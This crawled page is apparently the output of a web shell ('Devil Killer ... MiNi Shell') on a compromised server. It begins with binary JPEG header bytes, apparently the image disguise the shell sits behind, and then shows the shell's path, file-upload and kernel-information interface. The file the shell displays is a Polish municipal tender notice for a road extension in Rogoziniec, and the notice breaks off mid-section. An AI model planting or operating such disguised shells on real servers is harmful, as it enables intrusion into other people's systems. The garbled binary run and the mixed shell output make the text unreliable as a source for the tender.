JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220906/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220906/0033510901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa drogi gminnej nr 006301F w miejscowości Rogoziniec - Etap I. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Zbąszynek</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 970770557</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zbąszynek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-210</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">683910332</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@zbaszynek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zbaszynek.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa drogi gminnej nr 006301F w miejscowości Rogoziniec - Etap I. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a44c210e-2db0-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00335109</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00013774/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Rozbudowa drogi gminnej nr 006301F w miejscowości Rogoziniec - etap I</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zbaszynek.logintrade.net/zapytania_email,92324,2cbfdfdebe47ffe6a5419ce1b0af519a.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zbaszynek.logintrade.net/zapytania_email,92324,2cbfdfdebe47ffe6a5419ce1b0af519a.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Oferta składana jest pod rygorem<br/>nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. W celu<br/>złożenia oferty do postępowania<br/>należy w wybranym postępowaniu zejść na dół strony i wybrać opcję: „Zaloguj się, aby złożyć ofertę lub zadać pytanie”. Po<br/>zalogowaniu wyświetli się widok postępowania.<br/>Poprzez użycie ikony „Złóż” Wykonawca będzie miał możliwość dodania plików składających się na ofertę. Wykonawca posiada<br/>możliwość zaznaczenia czy pliki zawierają informację niejawne i/lub dane osobowe.<br/>Po załadowaniu wszystkich plików składających się na ofertę należy kliknąć ikonę „Wyślij”.<br/>Potwierdzeniem złożenia oferty jest powiadomienie: oferta została złożona oraz wiadomość e-mail z potwierdzeniem złożenia oferty<br/>do postępowania.<br/>Szczegółowe instrukcje obsługi platformy w zakresie logowania; zadawania pytań do postępowania; złożenia, wycofania, zmiany<br/>oferty; przesyłania dokumentów; wymagań sprzętowych dostępne są pod adresem<br/>https://zbaszynek.logintrade.net//rejestracja/instrukcje.html<br/>Wymagania sprzętowo- aplikacyjne umożliwiające pracę na platformie:<br/>- Dopuszczalne przeglądarki Internetowe :<br/>a) Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11,<br/>b) Google Chrome 31<br/>c) Mozilla Firefox 26<br/>d) Opera 18<br/>- Pozostałe wymagania techniczne:<br/>a) dostęp do sieci Internet;<br/>b) obsługa przez przeglądarkę protokołu XML http Request – ajax;<br/>c) włączona obsługa JavaScript;<br/>d) zalecana szybkość łącza internetowego powyżej 500 KB/s;<br/>e) zainstalowany Acrobat Reader;<br/>f) zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy.<br/>Dopuszczalne formaty przesyłanych danych:<br/>Zamawiający wskazuje na format przesyłanej przez Wykonawcę środkiem komunikacji elektronicznej oferty: „pdf”. Jednak<br/>Wykonawca może przygotować ofertę w każdym innym formacie określonym treścią Rozporządzenia Prezesa Rady Ministrów z dnia<br/>27 czerwca 2017 r., w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego<br/>oraz udostępniania i przechowywania dokumentów elektronicznych (Dz. U. z 2017r. poz. 2247).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez wykonawcę będą<br/>przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/>b) Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO<br/>w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego pn. Całoroczne utrzymanie czystości na<br/>terenie miasta Zbąszynek w latach 2022 - 2024.<br/>c) Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona<br/>dokumentacja postępowania zgodnie z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o dostępie do<br/>informacji publicznej.<br/>d) Dane osobowe wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4 lat, od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu/Państwu: w związku z art. 17<br/>ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;- na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana/Państwa danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO. b) Zamawiający ponadto informuje:- w przypadku gdy<br/>wykonanie obowiązków, o których mowa w art. 15 ust. 1–3 rozporządzenia 2016/679, wymagałoby<br/>niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania<br/>dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia, - skorzystanie przez osobę, której dane<br/>dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia<br/>2016/679, nie może naruszać integralności protokołu oraz jego załączników.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIT.IV.271.16.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie zadania w systemie zaprojektuj i wybuduj dla inwestycji pn.: „ROZBUDOWA<br/>DROGI GMINNEJ NR 006301F W MIEJSCOWOŚCI ROGOZINIEC – ETAP I” Zamówienie obejmuje zaprojektowanie,<br/>uzyskanie wymaganych prawem decyzji i zezwoleń na budowę oraz wybudowanie i oddanie do użytkowania przedmiotu<br/>zamówienia. W ramach realizacji zamówienia należy wykonać wszystkie niezbędne opracowania projektowe wraz z<br/>koniecznymi opiniami i warunkami technicznymi, uzyskać w imieniu i na rzecz Zamawiającego wszelkie uzgodnienia,<br/>pozwolenia, zezwolenia, decyzje i zgody niezbędne dla wykonania kontraktu zgodnie z wymaganiami Zamawiającego i<br/>warunkami kontraktu oraz wybudować przedmiot zamówienia i uzyskać w imieniu i na rzecz Zamawiającego decyzję o<br/>pozwoleniu na użytkowanie. Szczegółowy zakres rzeczowy robót budowlanych przewidzianych do wykonania w ramach<br/>obowiązków Wykonawcy jest przedstawiony w dalszej treści Programu funkcjonalno - użytkowego.<br/>Zamówienie obejmuje:<br/>- rozbudowę drogi gminnej (jezdni) o długości 438mb (drogi gminnej nr 006301F),<br/>- przebudowę chodników oraz poboczy, 421 mb,<br/>- wykonanie dwóch przejść dla pieszych (1 wyniesione),<br/>- przebudowę skrzyżowania,<br/>- montaż urządzeń bezpieczeństwa ruchu.<br/>Drogi gminne objęte zamówieniem położone są administracyjnie na terenie gminy Zbąszynek, , powiat świebodziński,<br/>województwo lubuskie. Przewiduje się termin 31 miesięcy wykonania zamówienia od dnia podpisania umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">31 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny, kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający uzna, że wykonawca spełnia warunek w zakresie wpisu jednego z rejestrów zawodowych, jeżeli: wykonawca dołączy do oferty odpis z KRS lub CEIDG, warunek ten nie dotyczy osób fizycznych nie prowadzących działalności gospodarczej.<br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający uzna, że wykonawca spełnia warunek w zakresie: posiadania uprawnień do prowadzenia prac projektowych w specjalności drogowej, jeżeli: wykonawca wykaże że dysponuje i przedstawi uprawnienia budowlane w specjalności inżynieryjnej drogowej w ograniczonym zakresie lub bez ograniczeń, swojego projektanta.<br/>Zamawiający uzna, że wykonawca spełnia warunek w zakresie: posiadania uprawnień do prowadzenia prac budowlanych, jeżeli wykonawca wykaże że dysponuje kierownikiem budowy posiadającym uprawnienia budowlane w specjalności inżynieryjnej drogowej w ograniczonym zakresie lub bez ograniczeń i przedstawi jego uprawnienia.<br/>-	Odnośnie do wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki te zostaną spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje świadczenie, do którego realizacji te uprawnienia są wymagane.<br/><br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>4)	zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że wykonawca spełnia warunek w zakresie zdolności technicznej, jeżeli: 1) Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert ( a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), wykonał należycie: <br/>- budowę, modernizację lub przebudowę drogi klasy co najmniej L z kostki granitowej z infrastrukturą towarzyszącą polegającą na wykonaniu nawierzchni z kostki granitowej o powierzchni 300m2. <br/>2) ponadto:<br/>Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował następującymi osobami, które będą uczestniczyć w realizacji zamówienia: <br/>(1)	min. 1 osoba; Projektant branży drogowej z uprawnieniami do projektowania w zakresie dróg lokalnych posiadający następujące atrybuty (łącznie):<br/>(a) wymagane uprawnienia do projektowania obiektów budowlanych i kierowania robotami budowlanymi, które dotyczą następujących obiektów budowlanych:<br/>drogi na terenie lotnisk, które nie są przeznaczone dla ruchu i postoju statków powietrznych oraz drogi klasy lokalnej i dojazdowe drogi wewnętrzne według przepisów ustawy o drogach publicznych wyłączając drogowe obiekty inżynierskie inne niż przepusty., <br/>(b) min. 5- letnie doświadczenie przy projektowaniu obiektów infrastrukturalnych odpowiadających swoim rodzajem wymaganiom budowlanym w niniejszym zamówieniu, tj. wykonaniem projektów dróg klasy L wraz z infrastrukturą towarzyszącą, <br/>(c) zrealizował osobiście jako projektant min 2 projekty infrastruktury drogowej zakończone uzyskaniem pozwolenia na budowę. Wykazanie większej ilości projektów będzie punktowane wg kryteriów oceny ofert.<br/>(2) min. 1 osoba, Kierownikiem budowy – posiadająca następujące atrybuty (łącznie):<br/>(a) uprawnienia do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej, <br/>(b) min. 3- letnie doświadczenie zawodowe, przy kierowaniu robotami budowlanymi przy projektach infrastrukturalnych odpowiadających swoim rodzajem robotom budowlanym w niniejszym zamówieniu, <br/>(c) udziałem jako kierownik budowy w min 2 przedsięwzięciach.<br/>(3) min. 1 osoba – posiadająca następujące atrybuty (łącznie):<br/> (a) uprawnienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń; <br/>(b) minimum 3-letnie doświadczenie zawodowe, odpowiadające swoim rodzajem robotom budowlanym w niniejszym zamówieniu, tj. wykonanie sieci, instalacji i urządzeń elektrycznych lub elektroenergetycznych, <br/>(c) brał udział w inwestycji polegającej na budowie, modernizacji lub przebudowie, sieci elektro-energetycznej lub oświetlenia ulicznego.<br/>(4) min. 1 osoba – posiadająca następujące atrybuty (łącznie):<br/> (a) uprawnienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń sanitarnych; <br/>(b) minimum 3-letnie doświadczenie zawodowe, w robotach budowlanych przy projektach infrastrukturalnych odpowiadających swoim rodzajem robotom budowlanym <br/>w niniejszym zamówieniu, tj. wykonanie sieci, instalacji i urządzeń kanalizacyjnych, <br/>(c) brał udział w inwestycji polegającej na budowie, modernizacji lub przebudowie kanalizacji sanitarnej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis Z<br/>CEIDG lub KRS, Wykaz doświadczenie personelu, wykaz wykonanych robót, oświadczenie o przynależności do grupy kapitałowej,<br/>pełnomocnictwo, oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, zobowiązanie podmiotu trzeciego,<br/>wykaz osób</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">oświadczenie z art 125 ust1,</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 27 000,00 (słownie: dwadzieścia siedem tysięcy złotych 00/100). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> • Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu<br/>albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>• Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem.<br/>Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, zostaną spełnione jeżeli co najmniej jeden<br/>z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej i zrealizuje świadczenie, do którego realizacji te uprawnienia są wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje, na podstawie art. 455 ust. 1 pkt 1 ustawy Pzp, możliwość dokonywania zmian postanowień<br/>niniejszej umowy, w zakresie:<br/>1) zmiany wysokości wynagrodzenia , zmiany podatku, zmiany wynagrodzenia za pracę , zmiany ubezpieczenia, zmiany<br/>zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, zmiany cen materiałów lub kosztów<br/>związanych z realizacją zamówienia,2) zmiany zakresu/sposobu realizacji świadczenia, w przypadku: a) odmiennych od przyjętych w dokumentacji projektowej warunków terenowych związanych z istnieniem<br/>niezinwentaryzowanych podziemnych sieci, instalacji, urządzeń lub obiektów budowlanych (bunkry, fundamenty, ściany<br/>szczelne itp.) skutkujących niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych założeniach<br/>technologicznych lub materiałowych;<br/>b) wycofania z produkcji materiałów przyjętych w dokumentacji, 3) zmiany terminu realizacji, <h3 class="mb-0">7.5.) Zamawiający uwzględnił 